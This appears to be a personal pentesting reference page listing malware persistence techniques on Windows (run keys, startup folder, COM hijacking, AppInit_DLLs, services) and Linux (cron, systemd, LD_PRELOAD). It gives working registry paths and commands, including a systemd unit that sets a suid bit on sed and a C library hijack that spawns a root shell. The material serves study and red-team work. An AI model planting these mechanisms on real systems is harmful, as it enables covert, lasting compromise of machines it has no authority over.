Last changed: 09.11.2018
Malware Persistence
Windows
Below I list a selection of the most presend persistend methods found in malware. A huge collection of persistence methods can be found on http://www.hexacorn.com/blog/2017/01/28/beyond-good-ol-run-key-all-parts/.
run keys (admin privileges)
Create a value my_program REG_SZ 'evil.exe'
in
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
run keys (user privileges)
Create a value my_program REG_SZ 'evil.exe'
in
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
or a value Run REG_SZ 'evil.exe'
in
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
startup folder
copy evil.exe "%allusersprofile%\microsoft\windows\start menu\programs\startup\"
copy evil.exe "%appdata%\microsoft\windows\start menu\programs\startup\"
$s=(New-Object -COM WScript.Shell);$lnk=$s.CreateShortcut([environment]::getfolderpath("startup")+"\start.lnk");$lnk.targetpath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe";$lnk.arguments="start-process -filepath c:\windows\system32\calc.exe";$lnk.save()
logon scripts
Create a value UserInitMprLogonScript
in
HKEY_LOCAL_MACHINE\Environment
or
HKEY_CURRENT_USER\Environment
custom shell
Create a value Shell
in
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
or
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
The malware should run explorer.exe
.
authentication packages
Create a value Authentication Package REG_MULTI_SZ 'mydll.dll'
or
Security Packages REG_MULTI_SZ 'mydll.dll'
in
HKLM\SYSTEM\CurrentControlSet\Control\Lsa
dll load order
If a program imports functions from a dll which is not in the program folder and not in
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\KnownDLLs
a malicious dll with the same name in the program folder will get loaded instead.
AppInit_DLLs
DLLs specified in the following keys will be loaded by user32.dll
into every
process that loads user32.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
Create a value AppInit_DLLs REG_EXPAND_SZ 'mydll.dll'
AppCertDlls
All applications calling CreateProcess
will load dlls from the key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls
Create a value my_dll REG_EXPAND_SZ 'mydll.dll'
AppPath
Affects all applications calling ShellExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
A subkey cmd.exe
value (Standard) REG_SZ 'c:\evil.exe'
will run evil.exe
if cmd.exe
shall be executed by the affected application.
Image File Execution Options
Create a value Debugger
with your command under
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable>
print spooler
The spoolsv.exe
loads libraries which are configured in
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors
Create your own subkey and there add a value Driver REG_SZ 'c:\mydll.dll'
Alternatively create your own subkey under
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors
and there add a value Driver REG_SZ 'mydll.dll'
. In this case your dll has
to be in the folder C:\Windows\System32\spool\prtprocs\x64\
.
services
To create a service from the command line see the pentesting commands for windows.
Installed services can be found in the key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
The service can also be added to svchost
by adding its name to the
corresponding group in
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SVCHOST\
In this case the service needs a Parameters
subkey containing the value
ServiceDll
and the associated dll needs to export ServiceMain
.
As drivers are installed as a service with type= kernel
rootkits could be found
here as well.
scheduled tasks
The command to create a scheduled task from the command line can also be found in the pentesting commands for windows.
The task will be run by the Scheduler
service.
COM hijacking
Create/replace the InprocServer32
key for COM Object with the malicious dll.
reg add HKCU\Software\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InprocServer32 /t REG_SZ /d c:\path\to\mydll.dll
Look at https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/ and https://attackiq.com/2020/03/26/component-object-model-hijacking/ for a nice summary.
Sometimes there can be scheduled task calling COM Objects. These can be found with powershell.
Get-ScheduledTask | foreach-object {if ($_.Actions.ClassID -ne $null -and $_.Triggers.Enabled -eq $true -and $_.Principal.GroupID -eq "Users"){write-host $_.TaskName;write-host $_.TaskPath;write-host $_.Actions.ClassId;write-host}}
WMI persistence
See https://github.com/n0pe-sled/WMI-Persistence/blob/master/WMI-Persistence.ps1 for powershell scripts which create and show WMI persistence.
Linux
rc files
/etc/profile
/etc/bash.bashrc
~/.profile
~/.bashrc
cron and anacron
Every user can create its own jobs with crontab
. The jobs are stored in a file
in the folder /var/spool/cron/crontabs/
with the name of the user.
echo '* * * * * /usr/bin/wall hello' | crontab -
As root user system wide jobs can be stored in /etc/crontab
or in a crontab
like file in /etc/cron.d
. Alternatively an executables can
be put into one of the folders /etc/cron.hourly
, /etc/cron.daily
,
/etc/cron.weekly
or /etc/cron.monthly
.
If anacron
is installed it will do the daily, weekly and monthly jobs instead
of cron
to ensure execution of jobs, which were missed due to system downtime.
Jobs specifically for anacron
can also be put in the file /etc/anacrontab
.
systemd services
Services in systemd
are configured in unit files
. To show the path where
systemd
looks for unit files
run
systemctl show --property=UnitPath | cat
To view the content of a unit file
use the command
systemctl cat <name>.service
unit files
can be created manually with a text editor or by running
systemctl edit --force --full example.service
example.service
[Unit]
Description=Set suid bit on sed
[Service]
ExecStart=chmod 4755 `which sed`
[Install]
WantedBy=multi-user.target
Services are started automatically if their corresponding target is run (like SysV runlevels). To show the current targets use
systemctl list-units --type=target
systemctl get-default
To link a service to a certain target put a symlink in the folder
/etc/systemd/system/<my_target>.target.wants/
or enable the service with
systemctl enable example.service
systemd timers
Systemd offers its own method of scheduling jobs called timers. Exsisting timers can by shown by running
systemctl list-timers
Timers consist of a timer unit file
and a matching service unit file
.
When a service is started by a timer it does not need the [Install]
section.
example.timer
[Unit]
Description=Run example.service weekly
[Timer]
OnCalendar=weekly
Persistent=true
[Install]
WantedBy=timers.target
LD_PRELOAD
To load a library into every created process the environment variable
LD_PRELOAD
can be used.
#include <stdio.h>
void __attribute__ ((constructor)) init(void){
printf("Press any key...");
int c = getchar();
}
Compile and test this behavior with
gcc -fPIC -shared -o lib.so lib.c
LD_PRELOAD=$PWD/lib.so ls
To make this change permanent the export can be written into one of the
rc files
or the path to the library can be put into /etc/ld.so.preload
.
runpath
If you can write to the runpath of a binary or a directory from
/etc/ld.so.conf*
you can put a library there. This should even work with
SUID
binaries.
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
int printf(const char *format, ... ){
uid_t uid, euid, new_uid;
uid = getuid();
euid = geteuid();
setreuid(euid, euid);
new_uid = getuid();
if (new_uid != uid)
system("/bin/sh");
return 0;
}
networking hooks
Depending on the networking client different methods exist to automatically run a script when a connection is established.
/etc/network/if-up.d/
/etc/NetworkManager/dispather.d/
kernel drivers
If the malware is a kernel rootkit it can be configured as a module to be loaded at boot. Depending on your distribution this could be done in the following locations.
/etc/modules
/etc/modules.conf
/etc/sysconfig/modules/
/etc/modules-load.d/